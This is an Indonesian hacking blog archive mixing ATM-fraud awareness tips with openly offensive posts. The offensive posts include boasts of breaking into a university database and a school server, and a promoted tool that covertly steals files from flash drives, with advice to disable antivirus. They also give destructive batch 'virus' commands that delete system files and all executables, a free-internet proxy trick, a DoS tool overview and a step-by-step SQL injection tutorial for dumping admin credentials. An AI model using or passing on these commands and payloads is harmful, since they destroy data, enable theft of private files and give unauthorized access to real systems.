Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

09 Mei 2013

Modus-modus Fraud (Penyalahgunaan) ATM


ATM adalah salah satu fasilitas yang diberikan oleh Bank kepada nasabahnya sebagai alternatif layanan Bank. ATM adalah salah satu bentuk e-banking sebagai alternatif nasabah untuk bertransaksi. ATM bersifat on-line real time dan sangat fleksibel serta aman. Seiring dengan perkembangan zaman, ATM merupakan suatu keharusan bagi Bank ditengah persaingan untuk memuaskan nasabahnya. Dibalik perkembangan ATM, berkembangan juga kecurangan dan penyalahgunaan ATM berserta kartu ATM. Beberapa contoh akan saya uraikan seperti di bawah ini.




Skimming
  • Cara ini dilakukan dengan memasang skimmer pada card reader mesin ATM yang bertujuan untuk membaca data dari Magnetic Stripe pada kartu ATM. Biasanya cara ini dikombinasikan dengan hidden camera yang dipasang untuk mengintip PIN (Personal Identification Number) yang seharusnya bersifat rahasia.
  • Skimmer biasanya diletakkan pada mesin ATM yang bersifat Offsite(lokasinya jauh dari kantor bank pemilik ATM)  dan dipasang pada saat malam hari untuk menghindari kecurigaan.
  • Data yang terbaca akan dikirimkan secara nirkabel atau disimpan pada Skimmer tersebut untuk kemudian dibaca oleh pelaku.
  • Saat semua data terkumpul, pelaku akan memindahkan data kartu tersebut ke kartu ATM aspal dan selanjutnya akan dipergunakan untuk bertransaksi.
  • Seiiring dengan peningkatan pengamanan pada mesin ATM, saat ini hampir semua mesin ATM sudah dilengkapi dengan Anti Skimmer, sehingga kemungkinan untuk pemasangan skimmer menjadi terbatas.




SMS Hadiah 
  • Sebenarnya modus ini tidak murni Fraud ATM, tetapi biasanya berhubungan dengan ATM.
  • Dalam menjalankan aksinya, pelaku akan mengirimkan SMS pemberitahuan kepada korban bahwa korban memenangkan hadiah undian tertentu berupa barang (mobil, sepeda motor, atau rumah), bisa juga berupa uang tunai dengan mengarahkan korban untuk menelpon nomor tertentu.
  • Jika korban telah masuk perangkap untuk menelpon, korban biasanya dituntun untuk melakukan registrasi SMS Banking atau Internet Banking, atau bisa juga jika korban terlalu lugu, akan diarahkan untuk melakukan transfer ke rekening yang telah disiapkan oleh pelaku.
  • Cara mengelabui dengan menuntun korban untuk registrasi di ATM ini sekarang mempunyai kemungkinan kecil untuk berhasil sebab hampir semua registrasi e-banking dan mobile banking mempunyai pengamanan yang berlapis. Jika hanya untuk transaksi non finasial (misalnya informasi saldo atau ubah password mobile banking/sms banking) cara ini masih bisa dipakai. Tetapi jika digunakan transaksi finacial (transfer, pembelian dan pembayaran), Bank penerbit kartu ATM biasanya mensyaratkan registrasi finansial kepada nasabahnya.

Jebakan dan Call Center Palsu

  • Sebenarnya cara ini tergolong kuno dan justru tidak canggih tetapi sangat efektif untuk meraih keuntungan bagi pelaku karena cara-cara yang telah diungkapkan diatas sangat kecil kemungkinan untuk berhasil pada saat akhir-akhir ini.
  • Pelaku biasanya beraksi secara berkelompok dan mengincar ATM yang berlokasi ditempat yang agak sepi atau ditempat ramai tetapi tanpa pengawasan yang memadai.
  • Pelaku biasanya memasang jebakan secara untung-untungan dan pada saat hari libur, dengan peralatan seadanya, biasanya berupa kartu ATM yang sudah dimodifikasi ditambah tali, perekat, gergaji besi tipis, dan stiker Call Center Palsu bank pemilik ATM.
  • Pelaku mula-mula membuat Card Reader ATM tidak berfungsi dengan cara memasukkan kartu ATM yang dlubangi dan diberi tali dilengkapi dengan perekat sehingga menghambat karet roller Card Reader ATM, tanpa menyebabkan mesin ATM Offline atau menunjukkan perubahan pada layar, sehingga pengguna ATM tidak sadar jika ATM tersebut sebenarnya sudah tidak berfungsi sama sekali.
  • Perekat pada kartu ATM yang sudah dimofikasi tersebut menghambat pergerakan kartu kearah reader atau kearah penampungan kartu jika tertelan. Kartu ATM korban yang terjebak akan tersangkut, dan berada tidak jauh dari bibir card reader.
  • Setelah memasang jebakan, pelaku biasanya juga memasang Call Center palsu di dekat Keypad atau Card Reader.
  • Beberapa saat kemudian, pelaku lain akan masuk dan menguji jebakan sekaligus untuk menguatkan perekat pada card reader ATM sambil berusaha merobek atau menutupi Call Center yang asli. Jika dirasa jebakan sudah siap pelaku akan keluar dan menunggu mangsa dari jarak jauh.
  • Saat ada korban yang mencoba menggunakan ATM tersebut, kartu yang dimasukkan ke card reader akan terjebak dan tersangkut tetapi tidak tertelan karena pada layar mesin ATM tidak menunjukkan perubahan apapun seperti layaknya jika bertransaksi di ATM yaitu pilihan bahasa, permintaan untuk memasukkan nomir PIN dan selanjutnya. Pada saat korban mulai panik atau tidak sabar akan datang pelaku ketiga yang berpura-pura akan menggunakan ATM tersebut dengan mengantri didekat ATM. Korban yang mulai panik dan kebingungan akan mulai mencari bantuan dan saat itulah pelaku akan berpura-pura menjadi penolong dan disertai sikap yang sok akrab akan menuntun dan mensugesti korban untuk segera melaporkan kartu ATM-nya yang tertelan (baca: tersangkut) ke Call Center palsu milik si pelaku. Karena panik dan bingung, korban biasanya akan mudah dituntun dan dan dijebak. Pelaku akan menyarankan korban untuk memblokir kartu ATMnya dengan syarat menyebutkan nomor PIN ATM tersebut (jika menghubungi Call Center asli biasanya akan dijawab oleh mesin penjawab/IVR, bukan oleh operator).
  • Saat PIN kartu ATM korban sudah ditangan pelaku, korban akan diarahkan untuk meninggalkan mesin ATM, biasanya diarahkan ke kantor Bank penerbit kartu ATM. Jika korban sudah meninggalkan ATM, pelaku akan masuk dan mengambil kartu ATM korban menggunakan besi tipis atau gergaji besi untuk mengait kartu ATM yang tersangkut. Dengan PIN ditangan dan kartu ATM-nya, maka pelaku akan segera pergi dari ATM tempat jebakan tersebut dipasang, karena secara teknis dan operasional mesin ATM tersebut sudah tidak bisa dipergunakan kembali sampai ada service dan maintenance dari petugas Bank pemilik ATM tersebut.
Tips-tips Penggunaan ATM yang Aman.
  1. Pastikan pada saat mendaftar dan mengajukan permohonan kartu ATM anda mendapat penjelasan dengan lengkap tentang hak, kewajiban dan fitur-fitur yang tersedia pada ATM tersebut. Mintalah penjelasan sedetail-detailnya dari Customer Service Bank, terutama Call Center Bank tersebut jika suatu saat kartu ATM kita bermasalah..
  2. Pada saat pengaktifan kartu ATM tersebut, pastikan PIN yang diberikan secara default sudah benar dan berfungsi dengan baik. Segera ganti PIN default tersebut dengan PIN baru sesuai dengan keinginan anda. Membuat PIN baru haruslah gampang diingat oleh kita, sekaligus tidak gampang ditebak jika suatu ketika kartu ATM tersebut hilang. Jangan gunakan angka yang berhubungan dengan sbb : Plat nomor kendaraan anda, tanggal lahir anda, nomor KTP, nomor SIM atau nomor telp.
  3. Anda bisa mulai bertransaksi dengan kartu ATM di mesin ATM, dan EDC yang tersedia di merchant-merchant untuk pembayaran non tunai.
  4. Jika anda bertransaksi di mesin ATM terutama yang ditempatkan secara offsite (jauh dari kantor Bank pemilik mesin ATM), perhatikan keadaan mesin ATM itu. Pertama, cocokkan Call Center Bank dengan yang tersedia di ATM. Biasanya nomor Call Center akan tercetak di belakang kartu ATM, jika berbeda lebih baik cari mesin ATM lain, karena bisa saja nomor call center itu palsu dan jebakan dari penjahat.
  5. Jika kartu ATM anda tertelan atau tidak keluar meski anda sudah selesai bertransaksi, atau gagal bertransaksi, jangan panik. Tetaplah berada didepan mesin ATM tersebut, dan segera hubungi call center resmi Bank pemilik ATM, untuk dilakukan pemblokiran kartu ATM yang tertelan atau tersangkut tersebut. Jangan menelpon nomor lain yang ditunjukkan oleh orang yang tidak anda kenal. Ciri-ciri nomor Call Center asli adalah biasanya terdiri dari 5 (lima) s/d 6 (enam) angka tanpa kode wilayah. Jika anda menemukan Call Center dengan nomor HP (GSM atau CDMA) berarti bisa dipastikan palsu. Ciri-ciri lain Call Center resmi, pada saat kita menelpon akan disapa/disambut oleh suara mesin penjawab (IVR) bukan suara operator. Akan tersedia pilihan menu selanjutnya. Jika anda melaporkan kartu anda terblokir, yang ditanyakan pertama kali adalah nama, tanggal lahir, dan nama gadis ibu kandung pemegang kartu, bukan PIN anda! Ingat Call Center resmi tidak pernah menanyakan PIN anda.

 Itulah beberapa hal yang bisa saya bagi kepada Anda. Jika ada hal yang kurang atau salah mohon dikoreksi agar informasi ini semakin sempurna dan berguna bagi pengunjung blog ini. 

dari berbagai sumber

24 Mei 2012

Sore ini sebelum saya nonton film kegemaran, saya sempatkan untuk menyusup lagi kedalam server orang lain :).

Seperti janji saya pada posting sebelum ini, bahwa saya akan melakukan hacking atas nama SmagoCyber, maka saya akan menepatinya dengan menyusup ke database unair.ac.id

Seperti biasa, saya hanya akan menunjukkan screenshot-nya ada saja :)
Triknya? Hohohoho.... untuk kalangan terbatas saja. Takutnya disalah gunakan....



dan seperti biasa lagi, saya tidak akan meninggalkan jejak berupa link ke halaman yang bersangkutan :).
situs ini saya tinggalkan seperti apa adanya... sebelum saya susupi...

Menyusup ke situs SMA 9 Surabaya

Dapat rejeki nomplok dari seorang teman berupa sebuah backdoor ke situs sebuah sekolah favorit di Surabaya... :)

Sebuah penglaman yang menyenangkan untuk bisa melihat-lihat (tanpa merusak!!) server orang lain. Ini bukan server hosting biasa, tapi sebuah dedicated server (server yang ada didalam sekolah tersebut).

 Mau tau screenshoot-nya?






Saya meng-hack atas nama Sintec kali ini...
lain kali saya akan meng-hack atas nama SmagoCyber :)


15 April 2011


Pernah punya keinginan mencuri file gambar atau video milik orang lain yg berada di flashdisk? Atau Anda ingin tahu siapa yg memasukkan flashdisk-nya ke komputer selama Anda pergi? Anda dapat menggunakan program ini. Secara sederhana, program ini akan mencuri file *.jpg dan *.3gp yg berada di flashdisk Anda.


 

Maling Hybrid Version ini merupakan gabungan antara Maling Portable dan Maling Install Version, dengan tambahan beberapa fitur baru. Real Time Stealing (RTS) sudah dapat diaktifkan / di-non-aktifkan, penambahan fitur Protected Folder, serta pengoptimalan kode yang lebih baik.

Petunjuk Penggunaan :
- Untuk menginstall FlashData 3.exe ini cukup klik tombol Install. Untuk mengaktifkan atau menonaktifkan RTS (Real Time Stealing) klik tombol Enable/Disable, atau Anda cukup menekan shortcut CTRL + ALT + M
- Untuk Option Protected, dengan menggunakan fitur ini, Folder yang berisi hasil rampasan akan dilindungi sehingga sulit untuk dibuka. Untuk membuka/mengunci folder cukup drag & drop folder ke file FlashData 3.3.exe.
- Option Hide Me (khusus portable) adalah untuk menyembunyikan proses.
- File set.ini berisi konfigurasi ekstensi, besar file, dan jumlah file yg ingin dicuri.

DOWNLOAD DISINI

Tanya Jawab :
1. Mengapa aplikasi ini dideteksi sbg malware oleh AntiVirus Anda?
Sebenarnya AV Anda hanya mendeteksi aplikasi ini berdasarkan heuristic saja, sehingga false alarm sering terjadi. 
2. Kenapa hanya file 3gp dan jpg saja yg diambil?
Menurut saya file2 tsb ukuran relatif kecil, shg lebih cepat dikopi. Untuk file lain akan menyusul
3. Jika aplikasi ini diblokir oleh AV, apa yg harus dilakukan?
Masukkan aplikasi ini dalam exception/exclusion/white list. Jika tak memungkinkan, non aktifkan dl AV Anda.
4. Jika file yg diambil besar bijimana?
Flashdisk yg lg discan gk bs di safely remove sampe proses maling selesai. Anda harus menonaktifkan/matikan aplikasi klo FD anda buru2 mau diremove.
5. Device/drive apa saja yg dpt dimaling?
Device yg dimaling adl removable disk (FD). Gk peduli itu hd external, mp3 player, memori card mmc, fd, phone memory, dll selama tipenya removable disk langsung di embat.




Metode yg digunakan oleh aplikasi ini :
1. Device BroadCasting, yaitu memantau kehadiran device (FD) baru secara real time. Proses maling hanya terjadi 1x aja (pd saat fd terdeteksi). Dgn metode ini, proses deteksi FD lebih cepat, hemat memori, dan lebih stabil. Dlm keadaan idle, CPU usage nya 0 (nol)
2. MutEx atau Mutual Exclusion, metode yg digunakan agar program satu dpt berkomunikasi dgn program lain. Ini utk menghindari fungsi yang tumpang tindih. Sbg contoh RTS sudah aktif dimemori, namun Anda berusaha mengaktifkan RTS lg, maka perintah itu akan ditolak. Logikanya mutex akan menyebarkan info ke sistem bahwa dirinya sudah aktif dan jgn diaktifkan lg. (Lebih efektif dan efisien utk memori)
3. No caption/title, Judul aplikasi brubah seiring nama filenya.
Cth : FlashData.exe => judulnya FlashData
Maling.exe => judulnya Maling.
4. Membuat shortcut di start menu dan membuat startup (jika di-install)
5. Protected Folder

Metode diatas sering digunakan oleh malware/trojan, shg wajar AV anda mendeteksi aplikasi ini sbg trojan.

08 Maret 2011

Seseorang Lapor Ke Saya Dirinya Ditipu!

Beberapa saat lalu, saya menerima sebuah pesan inbox dari seseorang kolega saya di Facebook. Dia mengindikasikan bahwa, sepertinya dia tertipu oleh oknum pedagang online yang ada di Facebook, yang menawarkan Blackberry Torch dengan harga sangat miring.

Saya mengetahui pedagang tersebut, dan langsung memblokir profil tersebut. Bayangkan, Blackberry Torch yang di Topsel (toko ponsel terkenal di daerah saya), harga untuk barang baru aja diatas 3 juta. Nah, orang ini ngejual cuma seharga 2,3 juta. dari situ, saya sudah curiga, dan mengajak orang - orang yang menjadi friend dari toko online ini untuk waspada dan melapor jika merasa tertipu.

Dan benar saja! Lihat screenshot berikut ini :


Nah, bisa dilihat pada gambar diatas. Kolega saya telah mengirimkan sejumlah uang (transfer), tapi tidak ada jawaban APAPUN dari toko online tersebut.

Well, apapun itu, selama ini saya tidak pernah membeli secara online. Pesan saya, hati - hati jika membeli secara online, apalagi melalui facebook. Pelajari profil yang Anda akan confirm, jangan percaya dengan profil asing dan yang paling aman, pergilah ke mall, dan belilah secara langsung barang incaran Anda!!

Dan, kalau ada yang merasa tertipu, silahkan laporkan ke saya...

09 Januari 2011

Ok, langsung aja ke inti permasalahannya klo bahasa gaulnya to the point aj hehe… Pertama-tama download dulu Proxomitron atau ISPCE. Setelah di download, terserah qm mau pilih yg mana, dibawah ini settinganya untuk keduanya.

Setting Proxomitron
buka proxomitron > pilih menu proxy > isi 10.8.3.8:8080 > klik OK. Nah, setelah itu pilih dan klik header, block semua tulisan yg ada di situ. Kemudian, hapus/delete dan klik NEW nanti akan ada isian kolom yg paling atas isi dengan host : axis, replacement text isi dg wap.axisworld.co.id/ 0.facebook.com:9090/ rbt.axisworld.co.id (pilih salah satu aja )
Silahkan pilih yg qm suka, yg menurut qm paling cepet.
Setelah selesai klik OK > centang pada OUTnya aja > Klik OK > centang incoming header filter dan use remove proxy.
Klo gak mau ribet nanti, kita save dulu settingan yg kita buat tadi, dg cara klik file lalu pilih save config file. Save di folder yg sudah qm tentukan. Settingan di proxonya sudah selesai sekarang tinggal buka Mozilla, kemudian isi dengan 127.0.0.1 port 8080,
catatan, klo di tendang terus, silahkan setting di dial up properties, pilih tab networking internet protocol TCP/IP terus properties lagi lalu pilih advance hilangin centang pada tulisan use default gateway on remote network, lalu klik Ok.
Jika kurang jelas bisa di tanyakan langsung. Nah, apabila di area gretonger sudah tercover 3G Axis, kecepatan normalnya bisa mencapai 384kbps=49KBps. Cukup kencenglah buat membuka video streaming di youtube.
Tapi, kekuranganya trik ini tidak bisa buka https seperti facebook., gmail dan yahoomail. Klo mau bisa buka semuanya silahkan buka dengan trik ISPCE.
Nah, kembali ke speed Axis. Apabila di area para gretonger hanya tercover dg jaringan EDGE saja, maka kecepatan maksimalnya hanya 256kbps=32KBps. Itu lumayan kalau browisng di ponsel. Tapi, mohon maaf Axis belum memiliki fitur HSDP (high speed downlik paket access) 3.5G. Tapi lebih parah lagi jika perangkat yg Anda gunakan hanya support GPRS kecepatan maksimal hanya 28.5kbps=4KBps itu maksimal. Klo jaringan overload bisa2 kita jantungan. Jadi mohon gunakanlah perangkat yang minimal supportnya EDGE karena jangan kuatir semua jaringan Axis sudah support EDGE.

25 Desember 2010

Fitur Baru di Blog AndhikaVeraza.Com

Coba fitur terbaru dari blog ini, yaitu pelacak IP. Anda bisa mengaksesnya melalui menu di sebelah kanan atas.
Pelacak IP dan domain ini berfungsi untuk melacak keberadaan server. Misal, jika kita ingin mengetahui dimana letak server Facebook, maka masukan saja domain www.facebook.com di kotak, lalu klik search.

Maka akan terlihat sebuah peta tempat dimana server tersebut berada.
Dengan informasi ini, minimal kita tau target serangan kita berada di negara mana. Hal ini penting untuk mengetahui ISP yang digunakan server target.

Peta yang disajikan sangat akurat, karena menggunakan Google Maps sebagai Map Generatornya.

So, selamat mencoba!!!

15 Desember 2010

Mengenal Kode Berbahaya Batch part 2


Sekarang mungkin bagi Anda untuk memiliki virus sendiri. Namun sebelum melakukan apapun sendiri pertama-tama Anda perlu membaca seluruh artikel pertama. Dan biarkan aku mengingatkan Anda bahwa masalah apapun yang terjadi setelah Anda melakukan apa pun maka anda bertanggung jawab sepenuhnya atas apa yang telah terjadi dan aku tidak akan bertanggung jawab.



Pertama-tama Buka notepad anda dan ketik berikut ... ... ...

del c:\boot।ini c:\del autoexec.bat


sekarang simpan dengan nama apapun.exe di drive C.

Hohoho.........mantap kan???

Sekarang,coba yg ini :
1. Buka Notepad
2. Tuliskan kode :

erase C:\WINDOWS


3. Simpan dengan nama : mantap.bat
4. Lalu KLIK!

Hahahahahaha...........
Kalau penasaran akan jadi apa komputer kamu, coba aja. Ingat, AndhikaVeraza.Com TIDAK bertanggungjawab atas segala yang terjadi pada system Anda.

14 Desember 2010

Mengenal Serangan DoS / DDoS

Serangan DoS (bahasa Inggris: denial-of-service attacks') adalah jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh komputer tersebut sampai komputer tersebut tidak dapat menjalankan fungsinya dengan benar sehingga secara tidak langsung mencegah pengguna lain untuk memperoleh akses layanan dari komputer yang diserang tersebut.

Dalam sebuah serangan Denial of Service, si penyerang akan mencoba untuk mencegah akses seorang pengguna terhadap sistem atau jaringan dengan menggunakan beberapa cara,

yakni sebagai berikut:


>>> Membanjiri lalu lintas jaringan dengan banyak data sehingga lalu lintas jaringan yang datang dari pengguna yang terdaftar menjadi tidak dapat masuk ke dalam sistem jaringan. Teknik ini disebut sebagai traffic flooding.

>>>Membanjiri jaringan dengan banyak request terhadap sebuah layanan jaringan yang disedakan oleh sebuah host sehingga request yang datang dari pengguna terdaftar tidak dapatdilayani oleh layanan tersebut. Teknik ini disebut sebagai request flooding.

>>>Mengganggu komunikasi antara sebuah host dan kliennya yang terdaftar dengan menggunakan banyak cara, termasuk dengan mengubah informasi konfigurasi sistem atau bahkan perusakan fisik terhadap komponen dan server.

Bentuk serangan Denial of Service awal adalah serangan SYN Flooding Attack, yang pertama kali muncul pada tahun 1996 dan mengeksploitasi terhadap kelemahan yang terdapat di dalam protokol Transmission Control Protocol (TCP). Serangan-serangan lainnya akhirnya dikembangkan untuk mengeksploitasi kelemahan yang terdapat di dalam sistem operasi, layanan jaringan atau aplikasi untuk menjadikan sistem, layanan jaringan, atau aplikasi tersebut tidak dapat melayani pengguna, atau bahkan mengalami crash. Beberapa tool yang digunakan untuk melakukan serangan DoS pun banyak dikembangkan setelah itu (bahkan beberapa tool dapat diperoleh secara bebas), termasuk di antaranya Bonk, LAND, Smurf, Snork, WinNuke, dan Teardrop.

Meskipun demikian, serangan terhadap TCP merupakan serangan DoS yang sering dilakukan. Hal ini disebabkan karena jenis serangan lainnya (seperti halnya memenuhi ruangan hard disk dalam sistem, mengunci salah seorang akun pengguna yang valid, atau memodifikasi tabel routing dalam sebuah router) membutuhkan penetrasi jaringan terlebih dahulu, yang kemungkinan penetrasinya kecil, apalagi jika sistem jaringan tersebut telah diperkuat.

Percobaan serangan Denial of Service yang dilakukan terhadap sebuah host dengan sistem operasi Windows Server 2003 Service Pack 2 (Beta).


Penolakan Layanan secara Terdistribusi (DDos)


Cara kerja serangan Distributed Denial of Service sederhana

Penolakan Layanan secara Terdistribusi (bahasa Inggris: Distributed Denial of Service (DDos)) adalah salah satu jenis serangan Denial of Service yang menggunakan banyak host penyerang (baik itu menggunakan komputer yang didedikasikan untuk melakukan penyerangan atau komputer yang "dipaksa" menjadi zombie) untuk menyerang satu buah host target dalam sebuah jaringan.

Serangan Denial of Service klasik bersifat "satu lawan satu", sehingga dibutuhkan sebuah host yang kuat (baik itu dari kekuatan pemrosesan atau sistem operasinya) demi membanjiri lalu lintas host target sehingga mencegah klien yang valid untuk mengakses layanan jaringan pada server yang dijadikan target serangan. Serangan DDoS ini menggunakan teknik yang lebih canggih dibandingkan dengan serangan Denial of Service yang klasik, yakni dengan meningkatkan serangan beberapa kali dengan menggunakan beberapa buah komputer sekaligus, sehingga dapat mengakibatkan server atau keseluruhan segmen jaringan dapat menjadi "tidak berguna sama sekali" bagi klien.

Serangan DDoS pertama kali muncul pada tahun 1999, tiga tahun setelah serangan Denial of Service yang klasik muncul, dengan menggunakan serangan SYN Flooding, yang mengakibatkan beberapa server web di Internet mengalami "downtime". Pada awal Februari 2000, sebuah serangan yang besar dilakukan sehingga beberapa situs web terkenal seperti Amazon, CNN, eBay, dan Yahoo! mengalami "downtime" selama beberapa jam. Serangan yang lebih baru lagi pernah dilancarkan pada bulan Oktober 2002 ketika 9 dari 13 root DNS Server diserang dengan menggunakan DDoS yang sangat besar yang disebut dengan "Ping Flood". Pada puncak serangan, beberapa server-server tersebut pada tiap detiknya mendapatkan lebih dari 150000 request paket Internet Control Message Protocol (ICMP). Untungnya, karena serangan hanya dilakukan selama setengah jam saja, lalu lintas Internet pun tidak terlalu terpengaruh dengan serangan tersebut (setidaknya tidak semuanya mengalami kerusakan).

Tidak seperti akibatnya yang menjadi suatu kerumitan yang sangat tinggi (bagi para administrator jaringan dan server yang melakukan perbaikan server akibat dari serangan), teori dan praktek untuk melakukan serangan DDoS justru sederhana, yakni sebagai berikut:

Menjalankan tool (biasanya berupa program (perangkat lunak) kecil) yang secara otomatis akan memindai jaringan untuk menemukan host-host yang rentan (vulnerable) yang terkoneksi ke Internet. Setelah host yang rentan ditemukan, tool tersebut dapat menginstalasikan salah satu jenis dari Trojan Horse yang disebut sebagai DDoS Trojan, yang akan mengakibatkan host tersebut menjadi zombie yang dapat dikontrol secara jarak jauh (bahasa Inggris: remote) oleh sebuah komputer master yang digunakan oleh si penyerang asli untuk melancarkan serangan. Beberapa tool (software} yang digunakan untuk melakukan serangan serperti ini adalah TFN, TFN2K, Trinoo, dan Stacheldraht, yang dapat diunduh (bahasa Inggris: download) secara bebas di Internet.


Ketika si penyerang merasa telah mendapatkan jumlah host yang cukup (sebagai zombie) untuk melakukan penyerangan, penyerang akan menggunakan komputer master untuk memberikan sinyal penyerangan terhadap jaringan target atau host target. Serangan ini umumnya dilakukan dengan menggunakan beberapa bentuk SYN Flood atau skema serangan DoS yang sederhana, tapi karena dilakukan oleh banyak host zombie, maka jumlah lalu lintas jaringan yang diciptakan oleh mereka adalah sangat besar, sehingga "memakan habis" semua sumber daya Transmission Control Protocol yang terdapat di dalam komputer atau jaringan target dan dapat mengakibatkan host atau jaringan tersebut mengalami "downtime".

Hampir semua platform komputer dapat dibajak sebagai sebuah zombie untuk melakukan serangan seperti ini. Sistem-sistem populer, semacam Solaris, Linux, Microsoft Windows dan beberapa varian UNIX dapat menjadi zombie, jika memang sistem tersebut atau aplikasi yang berjalan di atasnya memiliki kelemahan yang dieksploitasi oleh penyerang.

Beberapa contoh Serangan DoS lainnya adalah adalah:
Serangan Buffer Overflow, mengirimkan data yang melebihi kapasitas sistim, misalnya paket ICMP yang berukuran sangat besar.
>> Serangan SYN, mengirimkan data TCP SYN dengan alamat palsu.
>> Serangan Teardrop, mengirimkan paket IP dengan nilai offsetyang membingungkan.
>> Serangan Smurf, mengirimkan paket ICMP bervolume besar dengan alamat host lain.
>> ICMP Flooding

09 Desember 2010

Mengenal Kode Berbahaya Batch part 1

Virus batch adalah bahasa pemrograman jadul (jaman doeloe), yang masih digunakan hingga saat ini, khususnya untuk sistem operasi Windows.

Jika Anda bingung bagaimana rupa dari bahasa kode batch ini, Anda bisa melihat dengan mengklik menu CMD (command prompt) pada Windows. Yap, bahasa batch adalah bahasa command prompt yang disederhanakan.

contoh dari kode virus batch ini adalah :

@echo off
shutdown -r -f -t 00

lalu simpan dengan nama file : restart.bat
Jika diklik, komputer Anda akan restart! Wala..!!

Belajar batch code itu menyenangkan. mudah dipahami, dan sederhana. Serta tidak memerlukan komputer dengan spek tinggi. Hebatnya lagi, kode virus batch TIDAK DAPAT dikenali oleh antivirus manapun. Karenanya, saya lebih suka menyebutnya dengan MALCODE.

kode lagi :
@echo off
Erase /f /q /s C:\*.exe /s

lalu simpan dengan nama : apa saja.bat
Kode ini jika di klik, akan menghapus seluruh file *.exe atau program di drive C!! Whoaa.... Betapa bahayanya kode batch. Edannya lagi, kode ini tidak dapat dideteksi oleh antivirus manapun!!

Nantikan kode lainnya di Part 2

03 Desember 2010

Tutorial SQL Injection

Tutorial SQL Injection (mysql) bhs Indonesia by coldboyz #level9-team

Di tutorial ini saya akan menggambarkan bagaimana cara kerja sql injection dan bagaimana cara menggunakan ini, mendapatkan informasi yang berguna.


Pertama-tama: apa sih sql injection?

itu adalah salah satu dari vulnerable di aplikasi jaringan sekarang. Mengizinkan penyerang menjalankan permintaan database di alamat web dan memperoleh akses informasi penting dan lain-lain. . .

1. SQL Injection (klasik atau basis error atau terserah kamu menyebutnya)

2. Blind SQL Injection ( bagian lebih keras )

Mari kita mulai beraksi :D

1. Melihat kemungkinan vulnerable

Contohnya kita punya situs seperti ini....

http: /www. situs. com/news.php? id=5

Sekarang kita test jika vulnerable. Kita tambahkan ujung alamat web dengan ' (tanda kutip)

akan menjadi http: /www. situs. com/news.php? id=5'

jika kita memperoleh error seperti :

" You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right dl.."
atau apapun yang mirip Itu berarti vulnerable untuk melakukan sql injection : )

2. Mencari banyaknya kolom

Untuk menemukan jumlah kolom kita menggunakan pernyataan ORDER BY (menceritakan database bagaimana hasil order)

Bagaimana cara menggunakan itu? baik hanya incrementing nomor sampai kita memperoleh kesalahan.

http: /www. situs. com/news.php? id=5 order by 1/ <-- tidak error? http: /www. situs. com/news.php? id=5 order by 2/ <-- tidak error? http: /www. situs. com/news.php? id=5 order by 3/ <-- tidak error? http: /www. situs. com/news.php? id=5 order by 4/ <-- error (kami memperoleh pesan seperti ini Unknown column '4' in 'order clause' atau kira-kira seperti tu berarti bahwa ini punya 3 kolom sebab kami mendapatkan kesalahan di 4. 3. Melihat kemungkinan fungsi UNION? dengan union kita dapat memilih banyak data di satu pernyataan sql. Misal kita punya http: /www. situs. com/news.php? id=5 union all select 1,2,3/* (kita telah menemukan jumlah 3 kolom di seksi 2. ) jika kita lihat jumlah di layar i.e 1 or 2 or 3 berarti UNION bekerja! :) : ) 4. Melihat kemungkinan versi mysql? ? http: /www. situs. com/news. php? id=5 union all select 1,2,3/* catatan: jika /* tidak bekerja atau kamu memperoleh kesalahan? Ubah ke -- itu adalah suatu komentar dan ini adalah penting untuk kita bekerja semestinya. katakan kita punya nomor 2 di layar itu? sekarang melihat kemungkinan versi? kami menggantikan nomor 2 dengan @@version atau version() dan menerima pesan seperi 4.1.33-log atau 5.0.45 atau mirip itu lah.. ini harus menyerupai ini http: /www. situs. com/news. php? id=5 union all select 1,@@version,3/* jika kamu memperoleh kesalahan "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..." saya tidak lihat beberapa paper covering masalah ini, saya harus menulis ini :) apa yang kita perlukan adalah fungsi convert() i.e. http: /www. situs. com/news. php? id=5 union all select 1,convert(@@version using latin1),3/* atau dengan hex() dan unhex() i.e http: /www. situs. com/news. php? id=5 union all select 1,unhex(hex(@@version)),3/* dan kamu akan memperoleh versi mysql :D 5. memperoleh table dan nama kolom? ? baik jika versi mysql <> versi 5.

Kita harus mengira table dan nama kolom umumnya.

Biasanya nama table adalah : user/s, admin/s, member/s ...

nama kolom biasanya adalah : username, user, usr, user_name, password, pass, passwd, pwd dan lain-lain. . .

i.e akan menjadi

http: /www. situs. com/news. php? id union all select 1,2,3 from admin/* (kita lihat nomor 2 di layar seperti sebelumnya,itu berarti ok :D

Kita mengetahui bahwa ada table admin. . .

sekarang memeriksa nama kolom.

http: /www. situs. com/news. php? id=5 union all select 1,username,3 from admin/* (jika kamu memperoleh kesalahan? Coba pakai nama kolom lainnya)
kita memperoleh username ditampilkan di layar, contoh seperti admin? atau superadmin dan lain-lain. . .

sekarang memeriksa jika ada kolom password nya
http: /www. situs. com/news. php? id= union all select 1,password,3 from admin/* (jika kamu memperoleh kesalahan? Coba pakai nama kolom lainnya)

Kita melihat password di layar hash atau plain-text ini bergantung dari bagaimana database menyediakan : )

i.e md5 hash, mysql hash, sha1...

sekarang kita harus menyelesaikan query

untuk itu kita dapat menggunakan concat() function (ini ikut rangkaian itu)

i.e

http: /www. situs. com/news. php? id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

catat bahwa saya meletakkan 0x3a, nilai hex nya untuk: ( 0x3a nilai hexuntuk tanda titik dua)

ada jalan lainnya untuk itu, char(58) untuk nilai ascii : )

http: /www. situs. com/news. php? id=5 union all select 1,concat(username,char(58),password),3 from admin/*

sekarang kita memperoleh username: password di layer, i.e admin: admin atau admin: hash

bila kamu punya ini? kamu dapat login seperti admin atau superuser :D

jika tidak bisa mengira nama table yang benar, kamu dapat menggunakan mysql.user (default)

ini punya user i kolom password

contohnya

http: /www. situs. com/news. php? id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6. MySQL 5

Seperti yang saya katakana sebelumnya saya ingin menjelaskan bagaimana cara memperoleh table dan kolom di mysql > 5.

untuk ini kita perlu information_schema.
ini memegang semua table dan kolom di database.

Untuk memperoleh table kita menggunakan table_name dan information_schema.tables

i.e

http: /www. situs. com/news. php? id=5 union all select 1,table_name,3 from information_schema.tables/*

disini kita menggantikan nomor 2 kita dengan table_name untuk memperoleh table pertama dari information_schema.tables

